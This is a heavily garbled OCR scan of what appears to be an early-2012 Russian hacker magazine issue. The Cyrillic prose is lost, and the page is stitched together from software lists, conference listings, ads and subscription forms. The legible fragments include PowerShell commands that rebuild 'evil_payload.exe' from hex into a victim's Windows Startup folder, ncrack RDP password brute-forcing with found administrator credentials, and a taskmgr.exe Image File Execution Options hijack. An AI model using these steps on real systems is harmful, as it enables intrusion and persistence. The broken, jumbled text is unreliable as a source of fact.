
PS > [byte[]] $hex = get-content


-encoding byte -path
C:\temp\evil_payload.exe
PS > [System.IO.File]: :WriteAllLines( "C:\
temp \hexdump.txt" , ([string]$hex))

did

NDRID-,

. ,

ANDROID?

GOOGLE,
!

,
,

Andoid'a,

Andoid ~DK,

. ,

86. -

hexdump.txt -

. ,

Andoid -

x86l www . andoid-x86 . og l,

77 9 144
184

64

255 255

232

ARM

Bluestacks

Bluestacks

I uestacks.com l. ,

l http:Uit.ly/Ys901 l,

did-,

14 31 ....
ach tne

Qevtces !felp

~ _J

. !
,

~~

!,

!
!.

Store

S-:

.....,

PS > [string]$hex = get-content -path


C:\Users\victim\Desktop\hexdump.txt
PS > [Byte[]] $temp = $hex -split ' '
PS > [System.IO.File]: :WriteAllBytes(
"C:\ProgramData\Microsoft\Windows\Start
Menu\Programs \ Startup\evil_payload.exe" ,
$temp)

Camera

..

'"'

Facebook
Plu s

lr

- ~~

AppBra in
Mark ...

Blapk
Market

Browser

Clock

Contacts

Gallery

Dev Tools

"
~

Global Time

..

";~.~~/,...

jetBoy

L...LLU

11
Calculator

"
Email

r-

~
Latitude

Calendar

f.
Facebook

Lunar
Lander

Android-x86, n
Nexus One!

EJ

VirtuaBox,

n n ,

FakeDNS I it.ly/szUFXI I.

fakedns.py I it. l y/vhgamQ J.

DNS-

Malcode

Python !

40 !

IJ

HostsMan I it.ly/uZAVOX I.

DNS-,

Analysis Pack. ApateDNS,

DNS-

' . I

hosts.

, ,

I- . !

fakeds .p y,

. , , 99%

01/156/2012

:1
137

UNITS/ FAQ UNITED


r,1

1:'.1

n . n

. ,

CRL + SHIF +

, n

ESC?

Medium [
). , n

Process l
[bit.ly/ugFDpx) n Replace
Task Manager, n

181

High.

Low, Media

192.168.26.137:3389, CL=2
rdp://192.168.26.137:3389 (EIO 1) Login
failed: 'administrator' 'admin'

n , -n

Oiscovered credentials
rdp :// 192.168.26.137:3389 'administrator' 'admin123'

. n

Pro cess

[View 7 Select
Columns 7 lntegrity Level). n

r.1
1:'.1

n n ,

- ? n,

nn :

- n ,

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Image File
Exec ution Options\taskmgr.exe

taskmgr.exe

usermode.

, n, n,

KeePass

n n ,

KeePass

netsh n

netsh interface dump > netsh-config1.txt

- .

[n,

: \u ti 1s\Process 1 \ . ) .

High,

KeyPass

n. l

dump:

r.1
1:'.1

1'.8

. n
. - ,

nn n n

NETSETMAN [WWW.NETSETMAN.COM )?

181

,
, .

Debugger

n
:

n [

KeyPass) n

- n

# - -- - --------- --- - - --- -- - - -- -- -- -- # Interface IP Configuration

# ------------- -- -------------------

WEBSOCKE?

n ,

pushd interface ip

# Interface IP Configuration for "Local

n,

. ,

Area Connection 1"


set address name= "Local Area Connection
1" source=dhcp
set dns name= "Local Area Connection 1"
source=dhcp register=PRIMARY
set wins name= "Local Area Connection 1"
source=dhcp
popd
# End of int erface IP configuration

181

1.

n -

2.

, ,

n .

n ,

, -Wireshark

Run as administrator.

Windows lntegrity Levels

n .

[www.wireshark.org ).

n n

n WebSockets,

icacls,

n,

n [n,

SOAP).

n Firefox
- Temper Data [ it.ly/sM49Hk ),

Chml [ it.ly/sOBLCm ). n,
"-i:h") n n
"-nr"):

n ,
n

nn~

netsh -1:

chml file.zip -i:h -nr

netsh -f netsh-config1.txt

r.1
1:'.1

WINDOWS
LEVELS?

INTEGRIY

file.zip
Access is denied.

, n,

. :::

Windows Vista, 7
Server 2008,
, - mandatory integrity level s [MIL).

181

n,

RDP ?

n ,

181 n

RD-, TSGinder [ it . ly/uThpnS ).

n , n,

Microsoft

n -n

n n

, n.

n nn

. n

RD

n n

. n :

U!! Dr. !! !3 r.!! !3 ~!! ~~~~ !;:...,:~~~

n ~ ~ ~~~ 1~ ~ ~ 1:~::--~;;:?.J

ncrack [nmap.org/ncrack) nmap ,

..:.]

n ,

138

,
n ,

$ ncrack -vv -d7 --user administrator \


- /home/user/passlist.txt \

Rechct.aiDNSQuerito !P: (" ll7Q01

r.

U~delihed 1192168.86129

FakeDNS DNS . .

01/156/2012

A~ache

CIAT 1.02
ClamAV 0.97.3
DirBuste 0.12

AutoHideDeskto~lcons

All Free 150 Burner


Avidemux 2.5.5
AV5 Media Pla ~e r 4.1.8.93
ExifTool8.71

~roximity

>Deskto~

~~

IP 5canner 3.0 Beta 6


3.1.3.1

lncrediMail 2.5
Koma-Mail 3.82
LiteManager 4.4.1
NetMeter 1.1.4
NetWorx 5.2.1
Pokki
RadioCiicker 8.11

Free[!roxy 4.10

Cli~Gab

Cheese 3.2.2
Clementine 0.7.1
Coolreade 3.0.43
Dvdisaster 0.72.3
Freecad 0.11.4422
Gnu~lot 4.4.4
Handbrake 0.9.5
lmageagick 6.7.3-8
K9coov 2.3.7

1.2.5

IDclassifv 1.1

GenXE 0.9.0
Go l15MERO
Gsasl1.6.1
HOPPE R

Gadmin-openvpn-server 0.1.5

Fwbuilder 5.0.0.3568

Emulation Framework 1.0.0

>Securit~

Chatsniff 1.0
Clamtk 4.36

UNIX

>Net

5~stem ~l

3.6.2
WhoCrashed 3.02
Mouse Button Control 2.0

5ongird

Svchost Process Anal:tzer

Perestroika 4.0.0
Real em~ 3.60
5mart Delrag 2.2

Nimi Visuals

Aweather 0.6
Chrome 15
Dada mail 4.8.4
Evolution 3.2.2
Fiefox 8.0.1
Getleft 1.2
lnstantird 1.1
Knemo 0.7.2
Ktorrent 4.1.3
Lft~ 4.3.3
Liferea 1.6.6
Lin~hone 3.4.3
Linuxdc2P..llQ.
5muxi 0.8
5tealthnet 0.8.7.9
5wift 1.0
Tvdownloader 0.7.2
Watchvideo 2.2.1

1.10.1
5TDU Viewer 1.6.62
?.9 lmage Viewer 1.3
Ubuntu 5kin Pack 8.0
WindowTabs

Sonarca Sound Recorder 3.7.8

Free Screen Video Recorder


2.5.19
Jim 2.0.0
i 3.0.0.1442
Man~Cam 2.6.60
Photosca~e 3.5

Free Audio Converter 5.0.2

DTaskManager 1.51
Free File Unlocker 1.0
GPU-Z 0.5.6
Tune 5.0
HDCione 4.0.7
JaBack 9.12

1.41

>S~stem

>Multimedia

Device Remover 0.9

>Net

WP5can 1.1
X-5can 3.3

0.9.1 7

E!_i~ear2.4.0

Netrek 3.3.0

5umataPDF

>Games

Nant 0.91
Open64 5.0
Padre 0.92
~ 1.7
Quexml 1.3. 7
.,t2 2.0.5
Ruby 1. 9.3-pQ
'@!grind 3.7.0

M aveyUo_3.0

Libmicrohtt~d

~lass2.0.0

Gtk 3.3.4
Javatools 0.44
Jvcl 3.45

~__l_

Window Maximizer v2.00


Windows-privesc-check

NMa~5i4 0.3 beta


PEiD Plugins
Rec 5tudio 4
thc-ssl-dos 1.4
U58 ~ 1.0
VanishCy t
VirtuaiKD 2.6
w3af 1.1
Windbgshark 0.0.1

NetworkMiner 1.2

GenXE 0.9.0
Hades
John the Ri~~er 1.7.9
MagicTree 1.0
MeMMoN
NetworkMiner 1.1

Emulation Framework 1.0.0


File Disclosure Browser

BeEF 0.4.2.11

. 9

tika 1.0
Dlib 17.44
Freebasic 0.23.0
Geany 0.21

>Devel

Buster Sandbox Anal:tzer 1.44

>Securit:t
Ariadne

Virtual Router

TweetMyPC 3.9
VideoCacheView 2.02

Terminals 2

Libreoffice 3.4.4
Metamo~hose 1.1.2
Ni~2 7.26.3
~
P~room 0.4.1
Tomboy__11]_
Wavesurfer 1.8.8~3
Xine 1.1.20
Xorriso 1.1.8

5k~~ Voice Changer 1.0


5mart5niff 1.91

RocketDock 1.35
1.9
UboroBot 2.0
ViewFD 2.3.0
Votumouse 1.72
Win5~1it Revolution 11.04

Rainmeter 2.1

7stacks 1.5
Droid ~l 0.8.8.2
EssentiaiPIM 4.5
FavBackup 2.1.1
Fences 1.01
FileMenu ools 6.0.1
FreeCommander 2009.02
Pointer5tick 1.21
Q-Dir 4.87

>Misc

5DL 1.2.14
5t~leCo~ 4.6
TRe~lacer 2.11
Utilu IE Collection 1.7.2.0

~~ter2.4.3

AjaxControiToolkit 4.1.51116
DEV-C++ 4.9.9.2
Dia 0.97.1
Facebook # 5DK 5.3.2
1.4.0
Heidi5QL 6.0
HiAsm 4.4
Json.N ET 4.0
Mocha 0.0.8
PHPExcel1.7.6
V5 1.1

>Develo~ment

WINDOWS

12.1

WinamD 0.7.1

DeTune 1.0.6
DVDTheque 3.1.2
GitHub 1.1
GV Connect Widqet 2.1 .1
JollysFastVNC 1.32
Mag ican 0.9.63
Mou 0.7.0
RaidEve 2.0
5ource 1.2. 9
Tincta 1.3.1
Veusz 1.14
VMware Fusion 4.1.1

Clementine Music Player

Amava 11.3.1
,t;p~ Hack 1.1
Aotana 5tudio 3.0
Art of lllusion 2.9
1.2

Q~en5U5 E

>X-distr

0.8.6
Css20111030
Di 4.31
Freei~a 2.1.3
Glpi 0.80.5
Greo 2.10
Libertine 5.1.3-2
Linux 3.1.3
Pis 6.1.0.8729
Pl-kernel 3.1.3
~~nctool 5.1
Virtualbox 4.1.6
Webmin 1.570
Winetricks 20111115
Zabix 1.8.9

A~t-dater

>System

Postg~!.i.lJ

Aoache 2.2.21
Asterisk 1.6.2.20
Bind 9.8.1 - ~ 1
Cu~s 1.5.0
DhcQill
Dovecot 2.0.16
Freeradius 2.1.12
1!ghtt~d 1.4.29
"11291 5.5.18
Nsdi2.9
Openldap 2.4.27
Openvpn 2.2.1
Postlix 2.8.7

>Server

~wi re 2.4.2.2
w3a-f-1.-1- -

~swan4.6. 1

. 7.1

John the Ri"'~~'-'e'-r-"1."-7."-9_ _ __


Naxsi 0.41
Nmap5i
Vulneraility Hunter 1.1.4.6
Rec 5tudio 4
Revelation 0.4.12
sqlsus . 7.1

ENCRYPTION

HAHTML5

PHONEGAP:

---

36 , 60

II .

L-

XML.

ANDROID

(j

2~:g

--"

frlhnrmet

trame}IIIIJd

:230.

800
!

191

2200

. (]

23/ ,
(250 )
- 30 ,
- 31 ,
- 31 .

8.5

DVD

!
!
,
, :

+ OVD

Total Football
+ OVO

DVD

OVDXpert

+ OVO

+ OVD

Smoke

+ 2 OVD

+ OVO

Digital Photo
+ DVD

+ DVD

1.


, ,

2.
3.

shop.glc.ru .

500

12
6

2200
1260

.
.

- -

e-mail: subsc riberag lc.ru ;


: [495) 545-09-06;
: 115280, ,
. , 19, ,
5 . , NQ 21,

000



+ +

2 DVD:162

, .

[ 35 % , )

!
.

12 3890 [24 ]
6 2205 [12 ]

? infocJglc .u

, , ].

no n
8[495]663-82-77 [ ! 8 [800] 200-3-999 [

D
D

12

_ _ __ _ _ _ _ 2011

7729410015

000

"

>>, .

No 40702810509000132297

No 30101810900000000990

D
D

04453990

**

( )

( )

770401001


<< _ _ _ _ _ _ _ >>

. . .

2011

. . .

7729410015

000

<< >>, .
/

No 407021 0509000132297

No 30101810900000000990

/
Q

<<. _ _ _ _ __

"" n r

n1-1 111

770401001

( )

e-mail

044583990

...

>>

2011

UNITS/WWW2

ldliilildil\fJII
www . outepw n. com

, n

. , mac_find [
-l phenoelit [
l. -
, . ,
, ,

I- . ,

:1.

lti[ltllil
ki cksend.com
,

Rapidshae , n
. -
, n

e-mail

. , ,
, , n: <<

e-mail

1 .

500

? , ,

- .

111111

@proXPN

Wllatpro~ll d.,.-

. upgr-.youton-tc_\IOII_,'o'F'Neno;rypiiOn
setont .. l'fpe1oolcometi!OifQIIIOSLatl<lc .... to3G
!Jt'\'OU1~:1"'<3!1._CI!IONWI!me\
ge/iii'IIPI<!'IIIIht.IS.A.UI(C(I'It

!lo\IO)OUtpiSS-CIC,ue<IIIC-U~Cie~
ometr.eplanas~on)'IIUI..,;tD ~.ts

po x pn. c om

, N,- n-lik-
VPN-cepep . ,

OpenVPN,

:!et!llle~)WVbl

lf.ltt.iif.lll

call:l

ctltl)1llon\les.

r.tconi.,.:Uwell~
n.r'llnotesiOIOUI-)'00~

, . ,
N . , . ,

. [
, WiFi-xocoyl,
.

..

VN-

JPC 2
Hom

IIVtrWIIId 10

jpc2.com

About JPC2

run 8ltOihlr opendlng system Iit 4ld not w.nt 10 ln8l8ll anylhlng?
Welllt811 Wll8t ...... VlnUIIIzatlan ln

w p8DI

<< >>.

Javascipt Emulato [ be l lad . o g/js l inux l,


[ JavaSciptl, Linux.

JPC 2

, ,

jpc2.com,

Windows

Ubuntu-

Java

, .

Windows Ubuntu

01/156/2012

UNITS 1GEEK ART

CODE

UNITS/ 2012

I I

NY2K+12

- ,

. USS

MUSTVISIT ,

20-23

: . -

14-16

30-31

2012

.d
Hack
Days

HITB

BLACKHAT

PHDAYS

confer ence.hitb.ora

www. ackhat

com

CONFIDENCE

www.ohdays.ru

PH DAYS

confjdence.orq.pl

, ,

. -

, -

, ,

. ,

26-29

F-.

25-26

2012

:1.

OEFCON RUSSIA

u
OCG *

7812

DEFCON

'2012

www.defcon .org

cc.org.ru

www.zeroniqhts.ru

, 20-

dmsn- .

- .

: -

. -

ZERONIGHTS

DEFCON
RUSSIA

www. d~f~oo-[yssja . [y

2011

, -

I/ -,

. -

'

'

'

01 / 156/201 2

I
*

OT&OPHbiE

, n .

, , n

TASH

.
3 .